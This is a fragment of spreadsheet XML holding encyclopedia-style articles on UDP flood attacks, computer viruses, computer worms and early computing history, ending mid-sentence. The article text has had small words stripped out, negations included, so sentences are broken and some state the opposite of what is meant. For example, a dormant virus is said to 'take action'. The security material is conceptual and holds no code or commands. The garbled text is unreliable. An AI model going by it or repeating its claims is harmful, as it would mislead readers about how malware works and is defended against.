    <t>feature comparison backup software general comparison list backup software. open source references</t>
  </si>
  <si>
    <t>UDP flood attack</t>
  </si>
  <si>
    <t>flood attack volumetric denial-of-service (dos) attack using user datagram protocol (udp), sessionless/connectionless computer networking protocol. using denial-of-service attacks straightforward transmission control protocol (tcp). however, flood attack initiated sending large number packets random ports remote host. result, distant host will: check application listening port; application listens port; reply icmp destination unreachable packet.thus, large number packets, victimized system forced sending many icmp packets, eventually leading unreachable clients. attacker(s) also spoof address packets, ensuring excessive icmp return packets reach them, anonymizing network location(s). most operating systems mitigate part attack limiting rate icmp responses sent. flood attack tools: orbit cannon unicornthis attack managed deploying firewalls points network filter unwanted network traffic. potential victim never receives never responds malicious packets firewall stops them. however, firewalls 'stateful' i.e. hold number sessions, firewalls also susceptible flood attacks. there ways protect system flood attacks. here examples possible measures: icmp rate-limiting: this limitation generally placed icmp responses operating system level. firewall-level filtering server: this enables suspicious packets rejected. however, possible firewall collapse strain flood attack. filtering packets (except dns) network level: requests typically made using udp. source generating huge amounts traffic considered suspicious, leads packets question rejected. references external links "ca-1996-01: port denial-of-service attack" (pdf). carnegie mellon university software engineering institute. archived original 2001-01-24. retrieved september 2019.</t>
  </si>
  <si>
    <t>Computer virus</t>
  </si>
  <si>
    <t>computer virus type computer program that, executed, replicates modifying computer programs inserting code. replication succeeds, affected areas said "infected" computer virus, metaphor derived biological viruses. computer viruses generally require host program. virus writes code host program. when program runs, written virus program executed first, causing infection damage. computer worm need host program, independent program code chunk. therefore, restricted host program, independently actively carry attacks.virus writers social engineering deceptions exploit detailed knowledge security vulnerabilities initially infect systems spread virus. viruses complex anti-detection/stealth strategies evade antivirus software. motives creating viruses include seeking profit (e.g., ransomware), desire send political message, personal amusement, demonstrate vulnerability exists software, sabotage denial service, simply wish explore cybersecurity issues, artificial life evolutionary algorithms.computer viruses cause billions dollars' worth economic damage year.in response, industry antivirus software cropped selling freely distributing virus protection users various operating systems. history first academic work theory self-replicating computer programs done 1949 john neumann gave lectures university illinois "theory organization complicated automata". work neumann later published "theory self-reproducing automata". essay neumann described computer program could designed reproduce itself. neumann's design self-reproducing computer program considered world's first computer virus, considered theoretical "father" computer virology. 1972, veith risak directly building neumann's work self-replication, published article "selbstreproduzierende automaten minimaler informationsübertragung" (self-reproducing automata minimal information exchange). article describes fully functional virus written assembler programming language siemens 4004/35 computer system. 1980 jürgen kraus wrote diplom thesis "selbstreproduktion programmen" (self-reproduction programs) university dortmund. work kraus postulated computer programs behave similar biological viruses. creeper virus first detected arpanet, forerunner internet, early 1970s. creeper experimental self-replicating program written thomas technologies 1971. creeper used arpanet infect pdp-10 computers running tenex operating system. creeper gained access arpanet copied remote system message, "i'm creeper. catch can!" displayed. reaper program created delete creeper.in 1982, program called "elk cloner" first personal computer virus appear wild"—that outside single computer computer created. written 1981 richard skrenta, ninth grader mount lebanon high school near pittsburgh, attached apple operating system spread floppy disk. 50th cloner virus would activated, infecting personal computer displaying short poem beginning "elk cloner: program personality." 1984 fred cohen university southern california wrote paper "computer viruses theory experiments". first paper explicitly call self-reproducing program "virus", term introduced cohen's mentor leonard adleman. 1987, fred cohen published demonstration algorithm perfectly detect possible viruses. fred cohen's theoretical compression virus example virus malicious software (malware), putatively benevolent (well-intentioned). however, antivirus professionals accept concept "benevolent viruses", desired function implemented without involving virus (automatic compression, instance, available windows choice user). virus definition make unauthorised changes computer, undesirable even damage done intended. first page solomon's virus encyclopaedia explains undesirability viruses, even nothing reproduce.an article describes "useful virus functionalities" published gunn title "use virus functions provide virtual interpreter user control" 1984. first virus "wild" boot sector virus dubbed (c)brain, created 1986 amjad farooq alvi basit farooq alvi lahore, pakistan, reportedly deter unauthorized copying software written. first virus specifically target microsoft windows, winvir discovered april 1992, years release windows 3.0. virus contain windows calls, instead relying interrupts. years later, february 1996, australian hackers virus-writing crew vlad created bizatch virus (also known "boza" virus), first known virus target windows late 1997 encrypted, memory-resident stealth virus win32.cabanas released—the first known virus targeted windows also able infect windows windows hosts).even home computers affected viruses. first appear commodore amiga boot sector virus called virus, detected november 1987. design parts computer virus generally contains three parts: infection mechanism, finds infects files, trigger, determines activate payload payload, malicious code execute. infection mechanism also called infection vector, virus spreads. some viruses search routine, locate infect files disk. other viruses infect files run, jerusalem virus. trigger also known logic bomb, part virus determines condition payload activated. this condition particular date, time, presence another program, size disk exceeding threshold, opening specific file. payload payload body virus executes malicious activity. examples malicious activities include damaging files, theft confidential information spying infected system. payload activity sometimes noticeable cause system slow "freeze". sometimes payloads non-destructive main purpose spread message many people possible. this called virus hoax. phases virus phases life cycle computer virus, described using analogy biology. this life cycle divided four phases: dormant phase virus program idle stage. virus program managed access target user's computer software, stage, virus take action. virus eventually activated "trigger" states event execute virus. viruses stage. propagation phase virus starts propagating, multiplying replicating itself. virus places copy programs certain system areas disk. copy identical propagating version; viruses often "morph" change evade detection professionals anti-virus software. each infected program contain clone virus, enter propagation phase. triggering phase dormant virus moves phase activated, perform function intended. triggering phase caused variety system events, including count number times copy virus made copies itself. trigger occur employee terminated employment period time elapsed, order reduce suspicion. execution phase this actual work virus, "payload" released. destructive deleting files disk, crashing system, corrupting files relatively harmless popping humorous political messages screen. targets replication computer viruses infect variety different subsystems host computers software. manner classifying viruses analyze whether reside binary executables (such .exe .com files), data files (such microsoft word documents files), boot sector host's hard drive combination these).a memory-resident virus simply "resident virus") installs part operating system executed, remains time computer booted shut down. resident viruses overwrite interrupt handling code functions, operating system attempts access target file disk sector, virus code intercepts request redirects control flow replication module, infecting target. contrast, non-memory-resident virus "non-resident virus"), executed, scans disk targets, infects them, exits (i.e. remain memory done executing).many common applications, microsoft outlook microsoft word, allow macro programs embedded documents emails, programs automatically document opened. macro virus "document virus") virus written macro language embedded documents users open file, virus code executed, infect user's computer. this reasons dangerous open unexpected suspicious attachments e-mails. while opening attachments e-mails unknown persons organizations help reduce likelihood contracting virus, cases, virus designed e-mail appears reputable organization (e.g., major bank credit card company). boot sector viruses specifically target boot sector and/or master boot record (mbr) host's hard disk drive, solid-state drive, removable storage media (flash drives, floppy disks, etc.).the common transmission computer viruses boot sector physical media. when reading drive, infected floppy disk flash drive connected computer transfer data, modify replace existing boot code. next time user tries start desktop, virus immediately load part master boot record.email viruses viruses intentionally, rather accidentally, uses email system spread. while virus infected files accidentally sent email attachments, email viruses aware email system functions. they generally target specific type email system (microsoft outlook commonly used), harvest email addresses various sources, append copies email sent, generate email messages containing copies attachments. detection avoid detection users, viruses employ different kinds deception. some viruses, especially platform, make sure "last modified" date host file stays file infected virus. this approach fool antivirus software, however, especially maintain date cyclic redundancy checks file changes. some viruses infect files without increasing sizes damaging files. they accomplish overwriting unused areas executable files. these called cavity viruses. example, virus, chernobyl virus, infects portable executable files. because files many empty gaps, virus, length, size file. some viruses avoid detection killing tasks associated antivirus software detect (for example, conficker). virus also hide presence using rootkit showing list system processes disguising within trusted process. 2010s, computers operating systems grow larger complex, hiding techniques need updated replaced. defending computer viruses demand file system migrate towards detailed explicit permission every kind file access. read request intercepts while kinds antivirus software employ various techniques counter stealth mechanisms, infection occurs recourse "clean" system unreliable. microsoft windows operating systems, ntfs file system proprietary. this leaves antivirus software little alternative send "read" request windows files handle requests. some viruses trick antivirus software intercepting requests operating system. virus hide intercepting request read infected file, handling request itself, returning uninfected version file antivirus software. interception occur code injection actual operating system files would handle read request. thus, antivirus software attempting detect virus either permitted read infected file, "read" request served uninfected version file.the reliable method avoid "stealth" viruses boot medium known "clear". security software used check dormant operating system files. most security software relies virus signatures, employ heuristics. security software also database file "hashes" windows files, security software identify altered files, request windows installation media replace authentic versions. older versions windows, file cryptographic hash functions windows files stored windows—to allow file integrity/authenticity checked—could overwritten system file checker would report altered system files authentic, using file hashes scan altered files would always guarantee finding infection. self-modification most modern antivirus programs find virus-patterns inside ordinary programs scanning so-called virus signatures. different antivirus programs employ different search methods identifying viruses. virus scanner finds pattern file, perform checks make sure found virus, merely coincidental sequence innocent file, notifies user file infected. user delete, cases) "clean" "heal" infected file. some viruses employ techniques make detection means signatures difficult probably impossible. these viruses modify code infection. that infected file contains different variant virus.one method evading signature detection simple encryption encipher (encode) body virus, leaving encryption module static cryptographic cleartext change infection next. case, virus consists small decrypting module encrypted copy virus code. virus encrypted different infected file, part virus remains constant decrypting module, would (for example) appended end. case, virus scanner cannot directly detect virus using signatures, still detect decrypting module, still makes indirect detection virus possible. since would symmetric keys, stored infected host, entirely possible decrypt final virus, probably required, since self-modifying code rarity finding reason enough virus scanners least "flag" file suspicious. compact arithmetic operation like addition subtraction logical conditions xoring, byte virus constant exclusive-or operation repeated decryption. suspicious code modify itself, code encryption/decryption part signature many virus definitions. simpler older approach key, encryption consisted operations parameters, like incrementing decrementing, bitwise rotation, arithmetic negation, logical not. some viruses, called polymorphic viruses, employ means encryption inside executable virus encrypted certain events, virus scanner disabled updates computer rebooted. this called cryptovirology. polymorphic code first technique posed serious threat virus scanners. just like regular encrypted viruses, polymorphic virus infects files encrypted copy itself, decoded decryption module. case polymorphic viruses, however, decryption module also modified infection. well-written polymorphic virus therefore parts remain identical infections, making difficult detect directly using "signatures". antivirus software detect decrypting viruses using emulator, statistical pattern analysis encrypted virus body. enable polymorphic code, virus polymorphic engine (also called "mutating engine" "mutation engine") somewhere encrypted body. polymorphic code technical detail engines operate.some viruses employ polymorphic code constrains mutation rate virus significantly. example, virus programmed mutate slightly time, programmed refrain mutating infects file computer already contains copies virus. advantage using slow polymorphic code makes difficult antivirus professionals investigators obtain representative samples virus, "bait" files infected typically contain identical similar samples virus. this make likely detection virus scanner unreliable, instances virus able avoid detection. avoid detected emulation, viruses rewrite completely time infect executables. viruses utilize technique said metamorphic code. enable metamorphism, "metamorphic engine" needed. metamorphic virus usually large complex. example, w32/simile consisted 14,000 lines assembly language code, part metamorphic engine. effects damage causing system failure, corrupting data, wasting computer resources, increasing maintenance costs stealing personal information. even though antivirus software uncover computer viruses (especially ones), computer security researchers actively searching ways enable antivirus solutions effectively detect emerging viruses, become widely distributed.a power virus computer program executes specific machine code reach maximum power dissipation (thermal energy output central processing units). computer cooling apparatus designed dissipate power thermal design power, rather maximum power, power virus could cause system overheat logic stop processor. this cause permanent physical damage. power viruses malicious, often suites test software used integration testing thermal testing computer components design phase product, product benchmarking.stability test applications similar programs effect power viruses (high usage) stay user's control. they used testing cpus, example, overclocking. spinlock poorly written program cause similar symptoms, lasts sufficiently long. different micro-architectures typically require different machine code maximum power. examples machine code appear distributed reference materials. infection vectors software often designed security features prevent unauthorized system resources, many viruses must exploit manipulate security bugs, security defects system application software, spread infect computers. software development strategies produce large numbers "bugs" generally also produce potential exploitable "holes" "entrances" virus. replicate itself, virus must permitted execute code write memory. reason, many viruses attach executable files part legitimate programs (see code injection). user attempts launch infected program, virus' code executed simultaneously. operating systems file extensions determine program associations (such microsoft windows), extensions hidden user default. this makes possible create file different type appears user. example, executable created named "picture.png.exe", user sees "picture.png" therefore assumes file digital image likely safe, opened, runs executable client machine. viruses installed removable media, flash drives. drives left parking government building target, hopes curious users insert drive computer. 2015 experiment, researchers university michigan found 45–98 percent users would plug flash drive unknown origin.the vast majority viruses target systems running microsoft windows. this microsoft's large market share desktop computer users. diversity software systems network limits destructive potential viruses malware. open-source operating systems linux allow users choose variety desktop environments, packaging tools, etc., means malicious code targeting systems affect subset users. many windows users running applications, enabling viruses rapidly spread among microsoft windows systems targeting exploits large numbers hosts.while linux unix general always natively prevented normal users making changes operating system environment without permission, windows users generally prevented making changes, meaning viruses easily gain control entire system windows hosts. this difference continued partly widespread administrator accounts contemporary versions like windows 1997, researchers created released virus linux—known "bliss". bliss, however, requires user explicitly, infect programs user access modify. unlike windows users, unix users administrator, "root user", except install configure software; result, even user virus, could harm operating system. bliss virus never became widespread, remains chiefly research curiosity. creator later posted source code usenet, allowing researchers worked.before computer networks became widespread, viruses spread removable media, particularly floppy disks. early days personal computer, many users regularly exchanged information programs floppies. some viruses spread infecting programs stored disks, others installed disk boot sector, ensuring would user booted computer disk, usually inadvertently. personal computers would attempt boot first floppy left drive. until floppy disks fell use, successful infection strategy boot sector viruses common "wild" many years. traditional computer viruses emerged 1980s, driven spread personal computers resultant increase bulletin board system (bbs), modem use, software sharing. bulletin board–driven software sharing contributed directly spread trojan horse programs, viruses written infect popularly traded software. shareware bootleg software equally common vectors viruses bbss. viruses increase chances spreading computers infecting files network file system file system accessed computers.macro viruses become common since mid-1990s. most viruses written scripting languages microsoft programs microsoft word microsoft excel spread throughout microsoft office infecting documents spreadsheets. since word excel also available could also spread macintosh computers. although viruses ability send infected email messages, viruses take advantage microsoft outlook component object model (com) interface. some versions microsoft word allow macros replicate additional blank lines. macro viruses simultaneously infect document, combination two, also self-replicating, appear "mating" would likely detected virus unique "parents".a virus also send address link instant message contacts (e.g., friends colleagues' e-mail addresses) stored infected machine. recipient, thinking link friend trusted source) follows link website, virus hosted site able infect computer continue propagating. viruses spread using cross-site scripting first reported 2002, academically demonstrated 2005. there multiple instances cross-site scripting viruses "wild", exploiting websites myspace (with samy worm) yahoo!. countermeasures 1989 adapso software industry division published dealing with electronic vandalism, followed risk data loss "the added risk losing customer confidence."many users install antivirus software detect eliminate known viruses computer attempts download executable file (which distributed email attachment, flash drives, example). some antivirus software blocks known malicious websites attempt install malware. antivirus software change underlying capability hosts transmit viruses. users must update software regularly patch security vulnerabilities ("holes"). antivirus software also needs regularly updated recognize latest threats. this malicious hackers individuals always creating viruses. german av-test institute publishes evaluations antivirus software windows android.examples microsoft windows anti virus anti-malware software include optional microsoft security essentials (for windows vista windows real-time protection, windows malicious software removal tool (now included windows (security) updates "patch tuesday", second tuesday month), windows defender optional download case windows xp). additionally, several capable antivirus software programs available free download internet (usually restricted non-commercial use). some free programs almost good commercial competitors. common security vulnerabilities assigned listed national vulnerability database. secunia example software, free personal use, check vulnerable out-of-date software, attempt update ransomware phishing scam alerts appear press releases internet crime complaint center noticeboard. ransomware virus posts message user's screen saying screen system remain locked unusable ransom payment made. phishing deception malicious individual pretends friend, computer security expert, benevolent individual, goal convincing targeted individual reveal passwords personal information. other commonly used preventive measures include timely operating system updates, software updates, careful internet browsing (avoiding shady websites), installation trusted software. certain browsers flag sites reported google confirmed hosting malware google.there common methods antivirus software application uses detect viruses, described antivirus software article. first, common method virus detection using list virus signature definitions. this works examining content computer's memory (its random access memory (ram), boot sectors) files stored fixed removable drives (hard drives, floppy drives, flash drives), comparing files database known virus "signatures". virus signatures strings code used identify individual viruses; virus, antivirus designer tries choose unique signature string found legitimate program. different antivirus programs different "signatures" identify viruses. disadvantage detection method users protected viruses detected signatures recent virus definition update, protected viruses (see "zero-day attack").a second method find viruses heuristic algorithm based common virus behaviors. this method detect viruses antivirus security firms define "signature", also gives rise false positives using signatures. false positives disruptive, especially commercial environment, lead company instructing staff company computer system services checked system viruses. this slow productivity regular workers. recovery strategies methods reduce damage done viruses making regular backups data (and operating systems) different media, either kept unconnected system (most time, hard drive), read-only accessible reasons, using different file systems. this way, data lost virus, start using backup (which hopefully recent). backup session optical media like closed, becomes read-only longer affected virus long virus infected file copied onto cd/dvd). likewise, operating system bootable used start computer installed operating systems become unusable. backups removable media must carefully inspected restoration. gammima virus, example, propagates removable flash drives.many websites antivirus software companies provide free online virus scanning, limited "cleaning" facilities (after all, purpose websites sell antivirus products services). some websites—like google subsidiary virustotal.com—allow users upload suspicious files scanned checked antivirus programs operation. additionally, several capable antivirus software programs available free download internet (usually restricted non-commercial use). microsoft offers optional free antivirus utility called microsoft security essentials, windows malicious software removal tool updated part regular windows update regime, older optional anti-malware (malware removal) tool windows defender upgraded antivirus product windows some viruses disable system restore important windows tools task manager cmd. example virus ciadoor. many viruses removed rebooting computer, entering windows "safe mode" networking, using system tools microsoft safety scanner. system restore windows windows windows vista windows restore registry critical system files previous checkpoint. often virus cause system "hang" "freeze", subsequent hard reboot render system restore point corrupted. restore points previous days work, provided virus designed corrupt restore files exist previous restore points.microsoft's system file checker (improved windows later) used check for, repair, corrupted system files. restoring earlier "clean" (virus-free) copy entire partition cloned disk, disk image, backup copy solution—restoring earlier backup disk "image" relatively simple usually removes malware, faster "disinfecting" computer—or reinstalling reconfiguring operating system programs scratch, described below, restoring user preferences. reinstalling operating system another approach virus removal. possible recover copies essential user data booting live connecting hard drive another computer booting second computer's operating system, taking great care infect computer executing infected programs original drive. original hard drive reformatted programs installed original media. once system restored, precautions must taken avoid reinfection restored executable files. popular culture first known description self-reproducing program fiction 1970 short story scarred gregory benford describes computer program called virus which, installed computer telephone modem dialing capability, randomly dials phone numbers hits modem answered another computer, attempts program answering computer program, second computer also begin dialing random numbers, search another computer program. program rapidly spreads exponentially susceptible computers countered second program called vaccine.the idea explored 1972 novels, when harlie david gerrold terminal michael crichton, became major theme 1975 novel shockwave rider john brunner.the 1973 michael crichton sci-fi movie westworld made early mention concept computer virus, central plot theme causes androids amok. alan oppenheimer's character summarizes problem stating "...there's clear pattern suggests analogy infectious disease process, spreading one...area next." replies stated: "perhaps superficial similarities disease" and, must confess find difficult believe disease machinery." other malware term "virus" also misused extension refer types malware. "malware" encompasses computer viruses along many forms malicious software, computer "worms", ransomware, spyware, adware, trojan horses, keyloggers, rootkits, bootkits, malicious browser helper object (bhos), malicious software. majority active malware threats trojan horse programs computer worms rather computer viruses. term computer virus, coined fred cohen 1985, misnomer. viruses often perform type harmful activity infected host computers, acquisition hard disk space central processing unit (cpu) time, accessing stealing private information (e.g., credit card numbers, debit card numbers, phone numbers, names, email addresses, passwords, bank information, house addresses, etc.), corrupting data, displaying political, humorous threatening messages user's screen, spamming e-mail contacts, logging keystrokes, even rendering computer useless. however, viruses carry destructive "payload" attempt hide themselves—the defining characteristic viruses self-replicating computer programs modify software without user consent injecting said programs, similar biological virus replicates within living cells. also references further reading external links viruses curlie (dmoz) microsoft security portal govt cert (computer emergency readiness team) site 'computer viruses theory experiments' original paper fred cohen, 1984 hacking away counterculture andrew ross hacking, 1990)</t>
  </si>
  <si>
    <t>Computer worm</t>
  </si>
  <si>
    <t>computer worm standalone malware computer program replicates order spread computers. often uses computer network spread itself, relying security failures target computer access machine host scan infect computers. when worm-invaded computers controlled, worm continue scan infect computers using computers hosts, behavior continue. computer worms recursive methods copy without host programs distribute based exponential growth, thus controlling infecting computers short time. worms almost always cause least harm network, even consuming bandwidth, whereas viruses almost always corrupt modify files targeted computer. many worms designed spread, attempt change systems pass through. however, morris worm mydoom showed, even "payload-free" worms cause major disruption increasing network traffic unintended effects. history actual term "worm" first used john brunner's 1975 novel, shockwave rider. novel, nichlas haflinger designs sets data-gathering worm revenge powerful national electronic information induces mass conformity. "you biggest-ever worm loose net, automatically sabotages attempt monitor there's never worm tough head long tail!"the second ever computer worm devised anti-virus software. named reaper, created tomlinson replicate across arpanet delete experimental creeper program (the first computer worm, 1971). november 1988, robert tappan morris, cornell university computer science graduate student, unleashed became known morris worm, disrupting many computers internet, guessed time tenth connected. during morris appeal process, u.s. court appeals estimated cost removing worm installation $200 $53,000; work prompted formation cert coordination center phage mailing list. morris became first person tried convicted 1986 computer fraud abuse act. features independence computer viruses generally require host program. virus writes code host program. when program runs, written virus program executed first, causing infection damage. worm need host program, independent program code chunk. therefore, restricted host program, independently actively carry attacks.exploit attacks because worm limited host program, worms take advantage various operating system vulnerabilities carry active attacks. example, "nimda" virus exploits vulnerabilities attack. complexity some worms combined page scripts, hidden html pages using vbscript, activex technologies. when user accesses webpage containing virus, virus automatically resides memory waits triggered. there also worms combined backdoor programs trojan horses, "code red".contagiousness worms infectious traditional viruses. they infect local computers, also servers clients network based local computer. worms easily spread shared folders, e-mails, malicious pages, servers large number vulnerabilities network. harm code designed spread worm typically referred "payload". typical malicious payloads might delete files host system (e.g., explorezip worm), encrypt files ransomware attack, exfiltrate data confidential documents passwords.some worms install backdoor. this allows computer remotely controlled worm author "zombie". networks machines often referred botnets commonly used range malicious purposes, including sending spam performing attacks.some special worms attack industrial systems targeted manner. stuxnet primarily transmitted lans infected thumb-drives, targets never connected untrusted networks, like internet. this virus destroy core production control computer software used chemical, power generation power transmission companies various countries around world stuxnet's case, iran, indonesia india hardest used "issue orders" equipment factory, hide commands detected. stuxnet used multiple vulnerabilities four different zero-day exploits (eg: [1]) windows systems siemens simaticwincc systems attack embedded programmable logic controllers industrial machines. although systems operate independently network, operator inserts virus-infected drive system's interface, virus able gain control system without operational requirements prompts. countermeasures worms spread exploiting vulnerabilities operating systems. vendors security problems supply regular security updates (see "patch tuesday"), installed machine, majority worms unable spread vulnerability disclosed security patch released vendor, zero-day attack possible. users need wary opening unexpected email, attached files programs, visit sites linked emails. however, iloveyou worm, increased growth efficiency phishing attacks, remains possible trick end-user running malicious code. anti-virus anti-spyware software helpful, must kept up-to-date pattern files least every days. firewall also recommended. users minimize threat posed worms keeping computers' operating system software date, avoiding opening unrecognized unexpected emails running firewall antivirus software.mitigation techniques include: acls routers switches packet-filters wrapper/acl enabled network service daemons nullrouteinfections sometimes detected behavior typically scanning internet randomly, looking vulnerable hosts infect. addition, machine learning techniques used detect worms, analyzing behavior suspected computer. worms good intent helpful worm anti-worm worm designed something author feels helpful, though necessarily permission executing computer's owner. beginning first research worms xerox parc, attempts create useful worms. those worms allowed john shoch hupp test ethernet principles network xerox alto computers. similarly, nachi family worms tried download install patches microsoft's website vulnerabilities host system exploiting vulnerabilities. practice, although made systems secure, generated considerable network traffic, rebooted machine course patching work without consent computer's owner user. regardless payload writers' intentions, security experts regard worms malware. study proposed first computer worm operates second layer model (data link layer), utilizing topology information content-addressable memory (cam) tables spanning tree information stored switches propagate probe vulnerable nodes enterprise network covered.anti-worms used combat effects code red, blaster, santy worms. welchia example helpful worm. utilizing deficiencies exploited blaster worm, welchia infected computers automatically began downloading microsoft security updates windows without users' consent. welchia automatically reboots computers infects installing updates. updates patch fixed exploit.other examples helpful worms "den_zuko", "cheeze", "codegreen", "millenium". also bluekeep botnet code shikara (worm) computer network surveillance computer virus email spam father christmas (computer worm) self-replicating machine technical support scam unsolicited phone calls fake "tech support" person, claiming computer virus problems timeline computer viruses worms trojan horse (computing) worm memory test worm zombie (computer science) references external links malware guide guide understanding, removing preventing worm infections vernalex.com. "the 'worm' programs early experience distributed computation", john shoch hupp, communications acm, volume issue (march 1982), 172–180. "the case using layered defenses stop worms", unclassified report u.s. national security agency (nsa), june 2004. worm evolution (archived link), paper jago maniscalchi digital threat, 2009.</t>
  </si>
  <si>
    <t>Computer</t>
  </si>
  <si>
    <t>computer digital electronic machine programmed carry sequences arithmetic logical operations (computation) automatically. modern computers perform generic sets operations known programs. these programs enable computers perform wide range tasks. computer system "complete" computer includes hardware, operating system (main software), peripheral equipment needed used "full" operation. this term also refer group computers linked function together, computer network computer cluster. broad range industrial consumer products computers control systems. simple special-purpose devices like microwave ovens remote controls included, factory devices like industrial robots computer-aided design, well general-purpose devices like personal computers mobile devices like smartphones. computers power internet, links billions computers users. early computers meant used calculations. simple manual instruments like abacus aided people calculations since ancient times. early industrial revolution, mechanical devices built automate long tedious tasks, guiding patterns looms. more sophisticated electrical machines specialized analog calculations early 20th century. first digital electronic calculating machines developed world first semiconductor transistors late 1940s followed silicon-based mosfet (mos transistor) monolithic integrated circuit (ic) chip technologies late 1950s, leading microprocessor microcomputer revolution 1970s. speed, power versatility computers increasing dramatically ever since then, transistor counts increasing rapid pace predicted moore's law), leading digital revolution late 20th early 21st centuries. conventionally, modern computer consists least processing element, typically central processing unit (cpu) form microprocessor, along type computer memory, typically semiconductor memory chips. processing element carries arithmetic logical operations, sequencing control unit change order operations response stored information. peripheral devices include input devices (keyboards, mice, joystick, etc.), output devices (monitor screens, printers, etc.), input/output devices perform functions (e.g., 2000s-era touchscreen). peripheral devices allow information retrieved external source enable result operations saved retrieved. etymology according oxford english dictionary, first known computer 1613 book called yong mans gleanings english writer richard brathwait: haue [sic] read truest computer times, best arithmetician euer [sic] breathed, reduceth dayes short number." this usage term referred human computer, person carried calculations computations. word continued meaning middle 20th century. during latter part period women often hired computers could paid less male counterparts. 1943, human computers women.the online etymology dictionary gives first attested computer 1640s, meaning 'one calculates'; "agent noun compute (v.)". online etymology dictionary states term mean "'calculating machine' type) 1897." online etymology dictionary indicates "modern use" term, mean 'programmable digital electronic computer' dates "1945 name; theoretical [sense] 1937, turing machine". history pre-20th century devices used computation thousands years, mostly using one-to-one correspondence fingers. earliest counting device probably form tally stick. later record keeping aids throughout fertile crescent included calculi (clay spheres, cones, etc.) represented counts items, probably livestock grains, sealed hollow unbaked clay containers. counting rods example. abacus initially used arithmetic tasks. roman abacus developed devices used babylonia early 2400 since then, many forms reckoning boards tables invented. medieval european counting house, checkered cloth would placed table, markers moved around according certain rules, calculating sums money. antikythera mechanism believed earliest known mechanical analog computer, according derek solla price. designed calculate astronomical positions. discovered 1901 antikythera wreck greek island antikythera, kythera crete, dated approximately devices comparable complexity antikythera mechanism would reappear fourteenth century.many mechanical aids calculation measurement constructed astronomical navigation use. planisphere star chart invented rayhān al-bīrūnī early 11th century. astrolabe invented hellenistic world either centuries often attributed hipparchus. combination planisphere dioptra, astrolabe effectively analog computer capable working several different kinds problems spherical astronomy. astrolabe incorporating mechanical calendar computer gear-wheels invented bakr isfahan, persia 1235. rayhān al-bīrūnī invented first mechanical geared lunisolar calendar astrolabe, early fixed-wired knowledge processing machine gear train gear-wheels, 1000 sector, calculating instrument used solving problems proportion, trigonometry, multiplication division, various functions, squares cube roots, developed late 16th century found application gunnery, surveying navigation. planimeter manual instrument calculate area closed figure tracing mechanical linkage. slide rule invented around 1620–1630 english clergyman william oughtred, shortly publication concept logarithm. hand-operated analog computer multiplication division. slide rule development progressed, added scales provided reciprocals, squares square roots, cubes cube roots, well transcendental functions logarithms exponentials, circular hyperbolic trigonometry functions. slide rules special scales still used quick performance routine calculations, circular slide rule used time distance calculations light aircraft. 1770s, pierre jaquet-droz, swiss watchmaker, built mechanical doll (automaton) could write holding quill pen. switching number order internal wheels different letters, hence different messages, could produced. effect, could mechanically "programmed" read instructions. along complex machines, doll musée d'art d'histoire neuchâtel, switzerland, still operates.in 1831–1835, mathematician engineer giovanni plana devised perpetual calendar machine, which, system pulleys cylinders over, could predict perpetual calendar every year (that 4000, keeping track leap years varying length. tide-predicting machine invented scottish scientist william thomson 1872 great utility navigation shallow waters. used system pulleys wires automatically calculate predicted tide levels period particular location. differential analyser, mechanical analog computer designed solve differential equations integration, used wheel-and-disc mechanisms perform integration. 1876, william thomson already discussed possible construction calculators, stymied limited output torque ball-and-disk integrators. differential analyzer, output integrator drove input next integrator, graphing output. torque amplifier advance allowed machines work. starting 1920s, vannevar bush others developed mechanical differential analyzers. first computer charles babbage, english mechanical engineer polymath, originated concept programmable computer. considered "father computer", conceptualized invented first mechanical computer early 19th century. after working revolutionary difference engine, designed navigational calculations, 1833 realized much general design, analytical engine, possible. input programs data provided machine punched cards, method used time direct mechanical looms jacquard loom. output, machine would printer, curve plotter bell. machine would also able punch numbers onto cards read later. engine incorporated arithmetic logic unit, control flow form conditional branching loops, integrated memory, making first design general-purpose computer could described modern terms turing-complete.the machine century ahead time. parts machine made hand major problem device thousands parts. eventually, project dissolved decision british government cease funding. babbage's failure complete analytical engine chiefly attributed political financial difficulties well desire develop increasingly sophisticated computer move ahead faster anyone else could follow. nevertheless, son, henry babbage, completed simplified version analytical engine's computing unit (the mill) 1888. gave successful demonstration computing tables 1906. analog computers during first half 20th century, many scientific computing needs increasingly sophisticated analog computers, used direct mechanical electrical model problem basis computation. however, programmable generally lacked versatility accuracy modern digital computers. first modern analog computer tide-predicting machine, invented william thomson (later become lord kelvin) 1872. differential analyser, mechanical analog computer designed solve differential equations integration using wheel-and-disc mechanisms, conceptualized 1876 james thomson, elder brother famous william thomson.the mechanical analog computing reached zenith differential analyzer, built hazen vannevar bush starting 1927. this built mechanical integrators james thomson torque amplifiers invented nieman. dozen devices built obsolescence became obvious. 1950s, success digital electronic computers spelled analog computing machines, analog computers remained 1950s specialized applications education (slide rule) aircraft (control systems). digital computers electromechanical 1938, united states navy developed electromechanical analog computer small enough aboard submarine. this torpedo data computer, used trigonometry solve problem firing torpedo moving target. during world similar devices developed countries well. early digital computers electromechanical; electric switches drove mechanical relays perform calculation. these devices operating speed eventually superseded much faster all-electric computers, originally using vacuum tubes. created german engineer konrad zuse 1939, earliest examples electromechanical relay computer.in 1941, zuse followed earlier machine world's first working electromechanical programmable, fully automatic digital computer. built 2000 relays, implementing word length operated clock frequency 5–10 program code supplied punched film data could stored words memory supplied keyboard. quite similar modern machines respects, pioneering numerous advances floating-point numbers. rather harder-to-implement decimal system (used charles babbage's earlier design), using binary system meant zuse's machines easier build potentially reliable, given technologies available time. universal computer could extended turing complete.zuse's next computer, became world's first commercial computer; initial delay second world war, completed 1950 delivered zurich. computer manufactured zuse's company, zuse founded 1941 first company sole purpose developing computers. vacuum tubes digital electronic circuits purely electronic circuit elements soon replaced mechanical electromechanical equivalents, time digital calculation replaced analog. engineer tommy flowers, working post office research station london 1930s, began explore possible electronics telephone exchange. experimental equipment built 1934 went operation five years later, converting portion telephone exchange network electronic data processing system, using thousands vacuum tubes. john vincent atanasoff clifford berry iowa state university developed tested atanasoff–berry computer (abc) 1942, first "automatic electronic digital computer". this design also all-electronic used vacuum tubes, capacitors fixed mechanically rotating drum memory. during world british code-breakers bletchley park achieved number successes breaking encrypted german military communications. german encryption machine, enigma, first attacked help electro-mechanical bombes often women. crack sophisticated german lorenz 40/42 machine, used high-level army communications, newman colleagues commissioned flowers build colossus. spent eleven months early february 1943 designing building first colossus. after functional test december 1943, colossus shipped bletchley park, delivered january 1944 attacked first message february.colossus world's first electronic digital programmable computer. used large number valves (vacuum tubes). paper-tape input capable configured perform variety boolean logical operations data, turing-complete. nine colossi built (the converted making machines total). colossus mark contained 1,500 